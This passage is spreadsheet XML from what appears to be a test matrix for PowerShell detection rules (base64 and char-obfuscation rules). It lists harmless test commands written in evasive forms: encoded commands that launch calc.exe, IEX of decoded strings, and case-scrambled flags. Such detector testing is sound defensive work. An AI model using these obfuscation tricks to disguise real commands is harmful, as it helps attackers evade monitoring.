      <c r="D841" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E841" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F841" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G841" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H841" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I841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841" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K841" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="842" ht="15.75" customHeight="1" s="42">
      <c r="A842" s="43" t="n"/>
      <c r="B842" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C842" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D842" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E842" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F842" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G842" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H842" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I842" s="43" t="n"/>
      <c r="J842" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K842" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="843" ht="15.75" customHeight="1" s="42">
      <c r="A843" s="43" t="n"/>
      <c r="B843" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C843" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D843" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E843" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F843" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G843" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H843" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I843" s="36" t="n"/>
      <c r="J843" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K843" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="844" ht="15.75" customHeight="1" s="42">
      <c r="A844" s="43" t="n"/>
      <c r="B844" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C844" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D844" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E844" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMManD "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F844" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G844" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H844" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I844" s="43" t="n"/>
      <c r="J844" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K844" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="845" ht="15.75" customHeight="1" s="42">
      <c r="A845" s="43" t="n"/>
      <c r="B845" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C845" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D845" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E845" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F845" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G845" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H845" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I845" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J845" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K845" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="846" ht="15.75" customHeight="1" s="42">
      <c r="A846" s="43" t="n"/>
      <c r="B846" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C846" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D846" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E846" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDeDcOmmand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F846" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G846" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H846" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I846" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J846" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K846" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="847" ht="15.75" customHeight="1" s="42">
      <c r="A847" s="43" t="n"/>
      <c r="B847" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C847" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D847" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E847" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F847" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G847" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H847" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I847" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J847" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K847" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="848" ht="15.75" customHeight="1" s="42">
      <c r="A848" s="43" t="n"/>
      <c r="B848" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C848" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D848" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E848" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODedCOMMand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F848" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G848" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H848" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I848" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J848" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K848" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="849" ht="15.75" customHeight="1" s="42">
      <c r="A849" s="43" t="n"/>
      <c r="B849" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C849" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D849" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E849" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enCodedCoMmAnD UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F849" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G849" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H849" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I849" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J849" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K849" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="850" ht="15.75" customHeight="1" s="42">
      <c r="A850" s="43" t="n"/>
      <c r="B850" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C850" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D850" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E850" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F850" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G850" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H850" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I850" s="43" t="n"/>
      <c r="J850" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K850" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="851" ht="15.75" customHeight="1" s="42">
      <c r="A851" s="43" t="n"/>
      <c r="B851" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C851" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D851" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E851" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F851" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G851" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H851" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I851" s="43" t="n"/>
      <c r="J851" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K851" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="852" ht="15.75" customHeight="1" s="42">
      <c r="A852" s="43" t="n"/>
      <c r="B852" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C852" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D852" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E852" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F852" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G852" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H852" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I852" s="43" t="n"/>
      <c r="J852" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K852" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="853" ht="15.75" customHeight="1" s="42">
      <c r="A853" s="43" t="n"/>
      <c r="B853" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C853" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D853" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E853" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaND "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F853" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G853" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H853" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I853" s="43" t="n"/>
      <c r="J853" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K853" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="854" ht="15.75" customHeight="1" s="42">
      <c r="A854" s="43" t="n"/>
      <c r="B854" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C854" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D854" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E854" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F854" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G854" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H854" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I854" s="43" t="n"/>
      <c r="J854" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K854" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="855" ht="15.75" customHeight="1" s="42">
      <c r="A855" s="43" t="n"/>
      <c r="B855" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C855" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D855" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E855" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F855" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G855" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H855" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I855" s="43" t="n"/>
      <c r="J855" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K855" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="856" ht="15.75" customHeight="1" s="42">
      <c r="A856" s="43" t="n"/>
      <c r="B856" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C856" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D856" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E856" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F856" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G856" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H856" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I856" s="43" t="n"/>
      <c r="J856" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K856" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="857" ht="15.75" customHeight="1" s="42">
      <c r="A857" s="43" t="n"/>
      <c r="B857" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C857" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D857" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E857" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnD "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F857" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G857" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H857" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I857" s="43" t="n"/>
      <c r="J857" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K857" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="858" ht="15.75" customHeight="1" s="42">
      <c r="A858" s="43" t="n"/>
      <c r="B858" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C858" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D858" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E858" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F858" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G858" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H858" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I858" s="43" t="n"/>
      <c r="J858" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K858" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="859" ht="15.75" customHeight="1" s="42">
      <c r="A859" s="43" t="n"/>
      <c r="B859" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C859" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D859" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E859" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F859" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G859" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H859" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I859" s="43" t="n"/>
      <c r="J859" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K859" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="860" ht="15.75" customHeight="1" s="42">
      <c r="A860" s="43" t="n"/>
      <c r="B860" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C860" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D860" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E860" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F860" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G860" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H860" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I860" s="43" t="n"/>
      <c r="J860" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K860" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="861" ht="15.75" customHeight="1" s="42">
      <c r="A861" s="43" t="n"/>
      <c r="B861" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C861" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D861" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E861" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommAND "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F861" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G861" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H861" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I861" s="43" t="n"/>
      <c r="J861" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K861" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="862" ht="15.75" customHeight="1" s="42">
      <c r="A862" s="43" t="n"/>
      <c r="B862" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C862" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D862" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E862" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F862" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G862" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H862" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I862" s="43" t="n"/>
      <c r="J862" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K862" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="863" ht="15.75" customHeight="1" s="42">
      <c r="A863" s="43" t="n"/>
      <c r="B863" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C863" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D863" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E863" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMand "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F863" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G863" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H863" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I863" s="43" t="n"/>
      <c r="J863" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K863" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="864" ht="15.75" customHeight="1" s="42">
      <c r="A864" s="43" t="n"/>
      <c r="B864" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C864" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D864" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E864" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F864" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G864" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H864" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I864" s="43" t="n"/>
      <c r="J864" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K864" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="865" ht="15.75" customHeight="1" s="42">
      <c r="A865" s="43" t="n"/>
      <c r="B865" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C865" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D865" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E865" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F865" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G865" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H865" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I865" s="43" t="n"/>
      <c r="J865" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K865" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="866" ht="15.75" customHeight="1" s="42">
      <c r="A866" s="43" t="n"/>
      <c r="B866" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C866" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D866" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E866" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F866" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G866" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H866" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I866" s="43" t="n"/>
      <c r="J866" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K866" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="867" ht="15.75" customHeight="1" s="42">
      <c r="A867" s="43" t="n"/>
      <c r="B867" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C867" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D867" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E867" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F867" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G867" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H867" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I867" s="43" t="n"/>
      <c r="J867" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K867" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="868" ht="15.75" customHeight="1" s="42">
      <c r="A868" s="43" t="n"/>
      <c r="B868" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C868" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D868" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E868" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F868" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G868" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H868" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I868" s="43" t="n"/>
      <c r="J868" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K868" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="869" ht="15.75" customHeight="1" s="42">
      <c r="A869" s="43" t="n"/>
      <c r="B869" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C869" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D869" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E869" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F869" s="36" t="b">
        <v>1</v>
      </c>
